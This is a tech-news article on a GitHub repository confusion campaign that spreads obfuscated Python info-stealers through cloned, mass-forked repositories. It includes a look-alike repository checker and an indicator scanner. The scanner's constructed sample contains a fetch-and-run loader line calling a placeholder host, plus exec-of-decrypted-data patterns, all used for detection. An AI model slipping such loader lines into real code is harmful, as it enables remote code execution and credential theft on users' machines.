What you need to know
- Cybersecurity firm Apiiro has reported that GitHub has suffered a major attack that could potentially affect thousands of people.
- This attack involves cloning a safe, clean repository, adding malicious obfuscated code, and re-uploading it.
- GitHub is trying to remove malicious repositories, but it seems like they can’t track them all.
In a recent report, Apiiro's security research and data science teams uncovered a very large-scale attack, which Apiiro calls a malicious repository confusion campaign. The Apiiro team estimates that over 100,000 GitHub repositories are affected, and possibly millions. Unfortunately, this isn't the first time we've had to report that GitHub is being used by malicious actors. A few months ago, we discussed how GitHub is being used to facilitate ransomware and to create a command and control channel for ransomware attacks.
These attacks are not very complex or difficult to stop. The problem is that they are occurring at such an alarming rate that GitHub seems to be struggling to keep up.
What is a repository confusion attack?
A GitHub repository is a place where GitHub users can upload and share code with others around the world. Some repositories are very popular and are searched for and downloaded frequently. In a repository confusion attack, according to Apiiro, an attacker downloads a popular, legitimate repository, adds malicious code to it, and re-uploads it to GitHub under the same name. The attackers then spread the fake versions of the repository to targeted users through social media, Discord, and other means. These characteristics resemble a watering hole attack, a very common pattern in cybersecurity.
A watering hole attack involves cyber attackers targeting a group of users and infecting websites that they frequently visit. The attackers patiently wait for users to visit these compromised websites, redirect them to malicious sites, infect the users' computers, and gain access to the organization's network.
Once these attackers reupload a malicious repository, they use automation to fork it thousands of times. This tactic is fairly commonly used. I remember a few years ago, there was a trending music album by a famous artist, and many people tried to download it via torrent. However, the files in circulation were malicious and caused many people to lose their data.
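The attack described above relies on a clone sharing the exact name of a well-known repository and on mass forking. One defensive check is to group search results by bare repository name and compare the candidates. The script below is an added example written for this article, not code from Apiiro or GitHub; the records are constructed, using a few real field names from GitHub REST API repository objects (full_name, fork, stargazers_count, created_at), and the ranking rule (prefer non-forks, then more stars, then the oldest) is a hypothetical heuristic, not a GitHub feature.

```python
"""Rank same-named repositories so look-alike clones stand out from the canonical one."""
from datetime import datetime, timezone
from typing import Optional

# Constructed sample: a few fields of GitHub REST API repository objects.
# Owner names, star counts and dates are invented for this example.
SEARCH_RESULTS = [
    {"full_name": "example-org/useful-tool", "fork": False,
     "stargazers_count": 4200, "created_at": "2019-03-02T10:00:00Z"},
    {"full_name": "user123/useful-tool", "fork": True,
     "stargazers_count": 0, "created_at": "2024-02-20T08:11:00Z"},
    {"full_name": "user456/useful-tool", "fork": False,
     "stargazers_count": 1, "created_at": "2024-02-21T03:45:00Z"},
    {"full_name": "other-org/unrelated", "fork": False,
     "stargazers_count": 10, "created_at": "2021-06-01T00:00:00Z"},
]


def parse_ts(ts: str) -> datetime:
    """Parse the ISO-8601 UTC timestamps GitHub returns (e.g. 2019-03-02T10:00:00Z)."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def pick_canonical(group: list) -> dict:
    """Among repos sharing a name: prefer non-forks, then more stars, then the oldest.
    (Hypothetical heuristic for this example.)"""
    return min(group, key=lambda r: (r["fork"], -r["stargazers_count"],
                                     parse_ts(r["created_at"])))


def flag_lookalikes(results: list, now: Optional[datetime] = None) -> dict:
    """Group results by bare repo name; for every name with several owners, report
    the canonical repo and each other candidate with its fork flag and age in days."""
    now = now or datetime.now(timezone.utc)
    groups = {}
    for repo in results:
        name = repo["full_name"].split("/", 1)[1]
        groups.setdefault(name, []).append(repo)
    report = {}
    for name, group in groups.items():
        if len(group) < 2:
            continue  # a unique name has nothing to be confused with
        canonical = pick_canonical(group)
        lookalikes = [
            {"repo": r["full_name"], "fork": r["fork"],
             "age_days": (now - parse_ts(r["created_at"])).days}
            for r in group if r is not canonical
        ]
        report[name] = {"canonical": canonical["full_name"], "lookalikes": lookalikes}
    return report


if __name__ == "__main__":
    for name, info in flag_lookalikes(SEARCH_RESULTS).items():
        print(f"{name}: canonical={info['canonical']}")
        for entry in info["lookalikes"]:
            print(f"  look-alike {entry['repo']} fork={entry['fork']} "
                  f"age_days={entry['age_days']}")
```

A fresh, starless repository or fork that reuses an established name is exactly the shape this campaign produces; the age and fork flag are cheap signals to review before cloning.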
How do malicious GitHub repositories infect my PC?
Apiiro and other cybersecurity companies call this a supply chain attack. While that may be technically true, I think GitHub barely qualifies as a supply chain.
Supply chain attacks are cyberattacks that target trusted third-party vendors or suppliers. "This includes injecting malicious code into software or compromising hardware components to gain unauthorized access to a company's network or data," according to CrowdStrike.
Typically, a supply chain attack comes through a third-party vendor or supplier with access to the infrastructure, rather than through a website that hosts code used in the company's environment.
These attacks obfuscate the code and primarily use Python to execute the payload. Once the payload is delivered and the vulnerability is exploited, the code uses BlackCap Grabber to perform actions on the target and send the stolen information to a command and control server. If you download a malicious GitHub repository, the following can be stolen from or run on your PC:
- Browser passwords, cookies, and browsing history
- System information
- Login credentials from apps and tools like Steam, MetaMask, Exodus, etc.
- It also attempts to bypass TokenProtector.
- Hijacks the Windows clipboard to replace a copied cryptocurrency address with the attacker's wallet address (among other features)
What can Microsoft do to make GitHub secure?
According to the report, "Although GitHub has been notified and most of the malicious repositories have been removed, the campaign continues, with increasingly prevalent attacks attempting to inject malicious code into the supply chain."
The attack began in May 2023 but has escalated rapidly. It has become a whack-a-mole situation: GitHub only seems to detect this code after it has been uploaded, which may be too late. If these attacks continue, more users may be infected.
If you're a heavy GitHub user, you probably can't rely on Microsoft or GitHub to keep you safe. Suppose you want to check whether your PC is infected. Apiiro provided a VirusTotal graph with some of the malicious files detected, but checking for each of those files on your PC would take a lot of time.
A quicker check is to search your PC for Python code matching any of the following strings:
- exec(fernet
- exec(request
- exec(__import
- exec(bytes
- exec("""\nimport
- exec(compile
- __import__("builtins").exec(
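The search above can be automated. The scanner below is an added example written for this article, not a tool from Apiiro; it walks a directory, reads every .py file, and reports the line number of each match for the seven strings listed. As a small generalisation beyond the literal strings, the patterns are compiled as regular expressions that tolerate whitespace around the parentheses and ignore case (so exec(Fernet( is caught as well as exec(fernet(). The sample inputs are constructed for the test and are not real malware.

```python
"""Scan Python source files for the obfuscated-loader strings listed above."""
import os
import re
import sys

# The seven indicator strings from the article, expressed as regexes that also
# tolerate whitespace around the parentheses (an added generalisation).
INDICATORS = {
    "exec(fernet": r"exec\s*\(\s*fernet",
    "exec(request": r"exec\s*\(\s*request",
    "exec(__import": r"exec\s*\(\s*__import",
    "exec(bytes": r"exec\s*\(\s*bytes",
    'exec("""\\nimport': r'exec\s*\(\s*"""\s*\n\s*import',
    "exec(compile": r"exec\s*\(\s*compile",
    '__import__("builtins").exec(':
        r'__import__\s*\(\s*["\']builtins["\']\s*\)\s*\.\s*exec\s*\(',
}
# Case-insensitive so that capitalised names such as Fernet are matched too.
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in INDICATORS.items()}


def scan_source(text: str) -> list:
    """Return sorted (line_number, indicator) pairs for every hit in a source string."""
    hits = []
    for name, rx in COMPILED.items():
        for match in rx.finditer(text):
            line_no = text.count("\n", 0, match.start()) + 1
            hits.append((line_no, name))
    return sorted(hits)


def scan_tree(root: str) -> dict:
    """Walk `root`, scan every .py file, and return {path: hits} for files with hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.endswith(".py"):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
            except OSError:
                continue  # unreadable file; skip rather than abort the scan
            if hits:
                findings[path] = hits
    return findings


# Constructed samples for the test: a benign module and a loader of the shape the
# article describes. Neither is real malware; the URL is a reserved .invalid name.
BENIGN_SAMPLE = '''import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''

SUSPICIOUS_SAMPLE = '''import requests
from cryptography.fernet import Fernet
key = b"placeholder-key"
exec(Fernet(key).decrypt(b"..."))
exec(requests.get("http://example.invalid/stage2").text)
__import__("builtins").exec(compile("pass", "<s>", "exec"))
'''


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in scan_tree(root).items():
        for line_no, name in hits:
            print(f"{path}:{line_no}: {name}")
```

Run it as `python scanner.py <directory>`; any hit deserves a manual look at the file, since these strings are the loader stage that decrypts or downloads the real payload rather than the payload itself.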
A best practice is to run unfamiliar code in a sandbox to protect your primary PC. Look for code that communicates with social media platforms or crypto wallets. Until Microsoft can address this issue, use caution when downloading code from GitHub.
GitHub isn’t the only cybersecurity issue facing Microsoft.
In an era of pervasive AI integration, this is a perfect time for Microsoft to prioritize internal security measures before expanding externally. Despite advances in AI, it remains clear that human analysts and engineers are essential to the first line of defense against cyber threats. As the cybersecurity landscape evolves, individuals interested in entering this field may find guidance such as the Cybersecurity Starter Guide valuable.
Microsoft recently launched Security Copilot, a tool that purports to enhance the performance of cybersecurity defenders. But its effectiveness depends heavily on customer engagement, reflecting Microsoft's hands-off approach and its notoriously minimal investment in customer service. This ethos appears to extend to cybersecurity, where Microsoft's efforts seem largely reactive, despite regular maintenance and updates like Patch Tuesday.
GitHub, a subsidiary of Microsoft, has been effectively exploited by hackers, raising questions about the company’s ability to leverage AI for defensive purposes. Still, if Microsoft can strengthen its systems, including its OS, servers, and subsidiaries such as GitHub, it could significantly reduce breach incidents worldwide, benefiting all parties.